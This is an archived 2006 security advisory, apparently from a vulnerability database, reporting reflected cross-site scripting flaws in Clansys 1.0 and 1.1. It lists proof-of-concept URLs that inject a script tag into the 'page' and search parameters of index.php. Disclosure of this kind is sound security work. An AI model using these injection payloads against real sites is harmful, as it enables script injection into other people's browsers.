Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12199
HistoryApr 13, 2006 - 12:00 a.m.

Clansys Multiple Xss Vulnerabilities

2006-04-1300:00:00
vulners.com
22

Clansys v.1.1 Multiple Xss Vulnerabilities

Bug:
Clansys v.1.0
1- http://victim/path/index.php?page=archiv&func=search
"><script>alert(/Soot/)</script>

Clansys v.1.1
1- http://victim/path/index.php?page=&quot;&gt;&lt;script&gt;alert&#40;/Soot/&#41;&lt;/script&gt;

2- http://victim/path/index.php?page=archiv&amp;func=search
"><script>alert(/Soot/)</script>


Source :
http://soot.shabgard.org/bugs/Clansys.txt

Credit :
Soot
Shabgard Security Team
http://www.shabgard.org

Greetz :
Hregy,Elite,Bl2k,Littlehacker